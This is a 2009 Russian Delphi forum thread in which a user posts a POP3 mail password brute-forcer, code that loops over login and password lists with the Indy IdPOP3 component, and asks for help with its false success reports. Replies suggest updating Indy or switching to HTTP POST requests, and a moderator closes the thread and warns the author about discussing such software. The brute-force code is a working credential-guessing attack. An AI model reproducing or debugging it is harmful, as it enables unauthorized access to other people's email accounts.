Форум программистов
 
Регистрация на форуме тут, о проблемах пишите сюда - alarforum@yandex.ru, проверяйте папку спам! Обязательно пройдите активизацию e-mail, а тут можно восстановить пароль

Купить рекламу на форуме 15-35 тыс рублей в месяц

Вернуться   Форум программистов > Delphi программирование > Работа с сетью в Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Закрытая тема
Ваша тема закрыта, почему это могло произойти? Возможно,
Нет наработок или кода, если нужно готовое решение - создайте тему в разделе Фриланс и оплатите работу.
Название темы включает слова - "Помогите", "Нужна помощь", "Срочно", "Пожалуйста".
Название темы слишком короткое или не отражает сути вашего вопроса.
Тема исчерпала себя, помните, один вопрос - одна тема
Прочитайте правила и заново правильно создайте тему.
 
Опции темы Поиск в этой теме
Старый 08.10.2009, 22:53   #1
betirsolt
Форумчанин
 
Регистрация: 20.07.2009
Сообщений: 421
По умолчанию майл брут

всем привет вот нашел один пример брута но че то тут не то
Код:
procedure TForm1.Button1Click(Sender: TObject);
var
LoginStrings, PassStrings:TStrings;
i, j:Integer;
begin
//Создаем массивы строк
LoginStrings:=TStringList.Create;
PassStrings:=TStringList.Create;
//Загружаем варианты — справочники имен и паролей
LoginStrings.LoadFromFile(NameEdit.Text);
Passstrings.LoadFromFile(PassEdit.Text) ;
//Устанавливаем адрес и порт сервера
IdPOP31.Host := ServerNameEdit.Text;
IdPOP31.Port := StrToInt(PortEdit.Text);
//Начинаем перебор
for i:=0 to LoginStrings.Count-1 do
for j:=0 to PassStrings.Count-1 do
begin
//Передаем имя и пароль компоненту
IdPOP31.Username := LoginStrings.Strings[i];
IdPOP31.Password := PassStrings.Strings[j];
//Попытка соединения.
try
IdPOP31.Connect;
except
end;
//Если соединение установлено, то выводим об этом сообщение
if IdPOP31.Connected then
begin
//Показываем найденный пароль
Application.MessageBox(PChar('Имя:'+LoginStrings.Strings[i]+'Пароль:'+PassStrings.Strings[j]), 'Пароль найден');
IdPOP31.Disconnect;
Exit;
end;
end;
//Уничтожаем массивы строк
LoginStrings.Free;
PassStrings.Free;
end;
все компилируется без ошибок,но когда запускаю прогу она выводит сообщение что пароль найден,не смотря на то что в файле с пассами его нет....и если даже он там есть то он показывает не правильный пароль...помогите разобраться
Уважаемые модераторы, Я всячески стараюсь не нарушать правила сайта, будьте снисходительны
betirsolt вне форума
Старый 08.10.2009, 22:59   #2
Вавел из ГМТУ
Форумчанин
 
Регистрация: 19.06.2009
Сообщений: 896
По умолчанию

Значит IdPOP31.Connected = True.
Вавел из ГМТУ вне форума
Старый 09.10.2009, 00:19   #3
betirsolt
Форумчанин
 
Регистрация: 20.07.2009
Сообщений: 421
По умолчанию

Цитата:
Сообщение от Вавел из ГМТУ Посмотреть сообщение
Значит IdPOP31.Connected = True.
как он может соединиться если там даже пароль не указан??или указан не верный???
у меня тут вообще интересно получаеться теперь.....если скомпиоировать тот же код в delphi7 то он работает отлично.....а вот если скомпиоировать в code gear то вообще не понятно как себя ведет эта прога
Уважаемые модераторы, Я всячески стараюсь не нарушать правила сайта, будьте снисходительны

Последний раз редактировалось betirsolt; 09.10.2009 в 01:01.
betirsolt вне форума
Старый 09.10.2009, 01:29   #4
TwiX
Участник клуба
 
Аватар для TwiX
 
Регистрация: 28.07.2009
Сообщений: 1,510
По умолчанию

Значит глючный idPop3. Обнови инди. Какая сейчас версия?
Я бы это делал через idHttp, пост-запросами.

Да и у тебя в подписи написано:
Цитата:
Не возжелай логин ближнего своего!
xD
TwiX вне форума
Старый 09.10.2009, 16:03   #5
betirsolt
Форумчанин
 
Регистрация: 20.07.2009
Сообщений: 421
По умолчанию

Цитата:
Сообщение от TwiX Посмотреть сообщение
Значит глючный idPop3. Обнови инди. Какая сейчас версия?
Я бы это делал через idHttp, пост-запросами.

Да и у тебя в подписи написано:
xD
какая версия я не знаю...но там у меня есть папки Indy10 и indy9....а через idHttp я и не умею(((а насчет логина мне важен сам процесс а не пароль...как мне ее обновить???у меня code gear
Уважаемые модераторы, Я всячески стараюсь не нарушать правила сайта, будьте снисходительны
betirsolt вне форума
Старый 09.10.2009, 17:25   #6
TwiX
Участник клуба
 
Аватар для TwiX
 
Регистрация: 28.07.2009
Сообщений: 1,510
По умолчанию

http://kvendi.pp.ru/?p=66

Вот тут достаточно подробно

А чтобы узнать версию инди, то, например, добавляем на форму idhttp и щёлкаем правой кнопкой - первая строчка сверху и есть версия "About InDy 10.5.7" - у меня
TwiX вне форума
Старый 11.10.2009, 15:44   #7
betirsolt
Форумчанин
 
Регистрация: 20.07.2009
Сообщений: 421
По умолчанию

Цитата:
Сообщение от TwiX Посмотреть сообщение
http://kvendi.pp.ru/?p=66

Вот тут достаточно подробно

А чтобы узнать версию инди, то, например, добавляем на форму idhttp и щёлкаем правой кнопкой - первая строчка сверху и есть версия "About InDy 10.5.7" - у меня
уменя 10.1.5 indy....ее стоит заменять????
Уважаемые модераторы, Я всячески стараюсь не нарушать правила сайта, будьте снисходительны
betirsolt вне форума
Старый 11.10.2009, 15:46   #8
Пепел Феникса
Старожил
 
Аватар для Пепел Феникса
 
Регистрация: 28.01.2009
Сообщений: 21,003
По умолчанию

я бы заменил.
Хорошо поставленный вопрос это уже половина ответа. | Каков вопрос, таков ответ.
Программа делает то что написал программист, а не то что он хотел.
Функции/утилиты ждут в параметрах то что им надо, а не то что вы хотите.
Пепел Феникса вне форума
Старый 11.10.2009, 17:12   #9
betirsolt
Форумчанин
 
Регистрация: 20.07.2009
Сообщений: 421
По умолчанию

я скачал ее.но там написано (Запустите Delphi , выберите в меню “Component”->”Install Packages”. В появившемся списке снимите галки с всех пакетов Indy. )у меня code gear и в этом появившемся окне нет ничего с названием indy...как ту быть??помогите обновить
Уважаемые модераторы, Я всячески стараюсь не нарушать правила сайта, будьте снисходительны
betirsolt вне форума
Старый 11.10.2009, 18:19   #10
Квэнди
Старожил
 
Аватар для Квэнди
 
Регистрация: 13.12.2006
Сообщений: 3,859
По умолчанию

Закрыто.
Автору: за обсуждение написания опдобнного софта, да еще и при тсутствии начальных знаний, в следующий раз будет предупреждение.
ICQ не для вопросов, а для предложений. Для вопросов используйте форум
IRC канал клуба программистов|Мои статьи
Квэнди вне форума
Закрытая тема
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подскажите пожалуйста скрипт для отправки данных на е-майл STANDING HTML и CSS 6 28.11.2015 11:03
Подскажите пожалуйста скрипт для отправки данных на е-майл STANDING PHP 3 07.10.2009 14:55
Брут http на Delphi YO$YA Работа с сетью в Delphi 2 21.01.2009 21:00